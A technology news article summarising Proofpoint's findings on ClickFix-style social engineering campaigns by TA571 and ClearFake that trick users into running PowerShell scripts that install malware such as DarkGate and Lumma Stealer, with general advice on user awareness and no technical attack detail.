Technology NewsTechnology NewsTechnology News
  • Computing
  • AI
  • Robotics
  • Cybersecurity
  • Electric Vehicle
  • Wearables
  • Gaming
  • Space
Reading: Hackers Exploit New Social Engineering to Deploy Malware
Share
Font ResizerAa
Technology NewsTechnology News
Font ResizerAa
Search
  • Computing
  • AI
  • Robotics
  • Cybersecurity
  • Electric Vehicle
  • Wearables
  • Gaming
  • Space
Follow US
  • Cookie Policy (EU)
  • Contact
  • About
© 2025 NEWSLINKER - Powered by LK SOFTWARE
Cybersecurity

Hackers Exploit New Social Engineering to Deploy Malware

Highlights

  • Hackers employ new social engineering to run PowerShell scripts.

  • Techniques include obfuscated scripts and browser injects.

  • Continuous user education is crucial to combat these threats.

Ethan Moreno
Last updated: 18 June, 2024 - 12:46 pm 12:46 pm
Ethan Moreno 12 months ago
Share
SHARE

Cybersecurity researchers at Proofpoint recently uncovered a sophisticated social engineering technique employed by hackers to run PowerShell and install malware. This method leverages psychological manipulation to trick users into performing harmful actions, such as surrendering their credentials or executing malicious scripts. The attackers have been using this strategy to exploit security loopholes, resulting in widespread malware infections.

Contents
New Social Engineering TechniqueCampaigns and Techniques

New Social Engineering Technique

Threat actors like TA571 and a malicious activity cluster, ClearFake, have been deceiving users into copying and pasting dangerous PowerShell scripts, thereby compromising their systems. Through methods such as malspam and browser injects, the attackers present users with fake error messages, prompting them to run scripts that ultimately download malware payloads, including DarkGate, Matanbuchus, and NetSupport. Read more.

Since March 2024, TA571 has been utilizing this technique, while ClearFake initiated similar campaigns in early April, continuing until June. The deceptive tactics include obfuscated scripts executed in multiple stages, which eventually install various malware families like Lumma Stealer and Amadey Loader. Technologies like EtherHiding and ZIP executable bundling further complicate detection efforts, making it challenging for security systems to identify and neutralize the threats.

Campaigns and Techniques

Researchers have identified the browser update overlay, nicknamed “ClickFix,” as a significant element in these attacks. This deceptive overlay appears on compromised websites, tricking users into consenting to run malicious PowerShell scripts. These scripts initially distributed Vidar Stealer, but by mid-May, the campaign evolved into what is now known as ClearFake. TA571’s campaigns also include HTML lures with fake error messages that prompt victims to paste and execute malicious scripts, resulting in infections from malware like Matanbuchus and DarkGate.

In the past, similar social engineering tactics have been used by various threat actors to exploit human vulnerabilities and deploy malware. However, the current wave of attacks demonstrates a higher level of sophistication in exploiting user trust through trusted applications and user interactions. This evolution highlights the necessity for continuous advancements in cybersecurity measures and user education to combat these increasingly complex threats.

Comparing this information to earlier reports, it is evident that social engineering remains a prevalent and effective method for cybercriminals. Previous incidents also focused on exploiting psychological aspects to deceive users, but the current techniques show an increased use of multi-stage infection chains and advanced obfuscation methods. This trend indicates a growing emphasis on bypassing traditional security controls and leveraging trusted user actions to achieve malicious objectives.

Overall, the ongoing developments in social engineering tactics underscore the importance of enhancing cybersecurity awareness and training. Organizations must prioritize user education to recognize and report such attempts, thereby reducing the risk of successful attacks. Continuous monitoring and updating of security protocols are essential to stay ahead of these evolving threats.

You can follow us on Youtube, Telegram, Facebook, Linkedin, Twitter ( X ), Mastodon and Bluesky

You Might Also Like

Law Enforcement Shuts Down AVCheck to Block Cybercriminal Tool Access

FBI Arrests DIA Insider for Alleged Classified Info Leak

Senators Demand DHS Restore Cyber Safety Review Board After Hack

Treasury Department Stops Crypto Scam Network With Sanctions

Attackers Target Ivanti EPMM Flaws, Breaching Major Sectors

Share This Article
Facebook Twitter Copy Link Print
Ethan Moreno
By Ethan Moreno
Ethan Moreno, a 35-year-old California resident, is a media graduate. Recognized for his extensive media knowledge and sharp editing skills, Ethan is a passionate professional dedicated to improving the accuracy and quality of news. Specializing in digital media, Moreno keeps abreast of technology, science and new media trends to shape content strategies.
Previous Article OPIX Ransomware Encrypts Files with Random Strings
Next Article Advanced Techniques for Securing B5G Networks from FL Attacks

Stay Connected

6.2kLike
8kFollow
2.3kSubscribe
1.7kFollow

Latest News

Robotics Innovations Drive Industry Forward at Major 2025 Trade Shows
Robotics
Iridium and Syniverse Deliver Direct-to-Device Satellite Connectivity
IoT
Wordle Players Guess “ROUGH” as June Begins With Fresh Puzzle
Gaming
SpaceX and Axiom Launch New Missions as Japan Retires H-2A Rocket
Technology
AI-Powered Racecars Drive Competition at Laguna Seca Event
Robotics
NEWSLINKER – your premier source for the latest updates in ai, robotics, electric vehicle, gaming, and technology. We are dedicated to bringing you the most accurate, timely, and engaging content from across these dynamic industries. Join us on our journey of discovery and stay informed in this ever-evolving digital age.

ARTIFICAL INTELLIGENCE

  • Can Artificial Intelligence Achieve Consciousness?
  • What is Artificial Intelligence (AI)?
  • How does Artificial Intelligence Work?
  • Will AI Take Over the World?
  • What Is OpenAI?
  • What is Artifical General Intelligence?

ELECTRIC VEHICLE

  • What is Electric Vehicle in Simple Words?
  • How do Electric Cars Work?
  • What is the Advantage and Disadvantage of Electric Cars?
  • Is Electric Car the Future?

RESEARCH

  • Robotics Market Research & Report
  • Everything you need to know about IoT
  • What Is Wearable Technology?
  • What is FANUC Robotics?
  • What is Anthropic AI?
Technology NewsTechnology News
Follow US
About Us   -  Cookie Policy   -   Contact

© 2025 NEWSLINKER. Powered by LK SOFTWARE
Welcome Back!

Sign in to your account

Register Lost your password?